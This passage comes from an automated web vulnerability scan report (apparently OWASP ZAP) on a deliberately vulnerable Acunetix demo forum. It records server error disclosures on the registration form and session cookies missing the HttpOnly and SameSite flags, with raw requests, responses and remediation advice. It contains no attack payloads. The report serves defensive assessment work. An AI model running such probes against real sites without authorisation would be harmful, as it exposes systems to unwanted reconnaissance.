Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 513 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
Instances | 89 |
Solution |
Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.
|
Reference | |
Tags |
WSTG-v42-ERRH-02
WSTG-v42-ERRH-01 OWASP_2021_A05 OWASP_2017_A06 |
CWE Id | 200 |
WASC Id | 13 |
Plugin Id | 90022 |
Low |
Cookie No HttpOnly Flag |
---|---|
Description |
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.
|
URL | http://testasp.vulnweb.com |
Method | GET |
Parameter | ASPSESSIONIDASSBRCRC |
Attack | |
Evidence | Set-Cookie: ASPSESSIONIDASSBRCRC |
Request Header - size: 213 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/ |
Method | GET |
Parameter | ASPSESSIONIDASSBRCRC |
Attack | |
Evidence | Set-Cookie: ASPSESSIONIDASSBRCRC |
Request Header - size: 214 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=EKIMIJFAFCFMONCJOBLJPEKD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:37 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 2 |
Solution |
Ensure that the HttpOnly flag is set for all cookies.
|
Reference | https://owasp.org/www-community/HttpOnly |
Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
CWE Id | 1004 |
WASC Id | 13 |
Plugin Id | 10010 |
Low |
Cookie without SameSite Attribute |
---|---|
Description |
A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective counter measure to cross-site request forgery, cross-site script inclusion, and timing attacks.
|
URL | http://testasp.vulnweb.com |
Method | GET |
Parameter | ASPSESSIONIDASSBRCRC |
Attack | |
Evidence | Set-Cookie: ASPSESSIONIDASSBRCRC |
Request Header - size: 213 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/ |
Method | GET |
Parameter | ASPSESSIONIDASSBRCRC |
Attack | |
Evidence | Set-Cookie: ASPSESSIONIDASSBRCRC |
Request Header - size: 214 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=EKIMIJFAFCFMONCJOBLJPEKD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:37 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>84</td><td>84</td><td>12/14/2022 3:23:34 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a 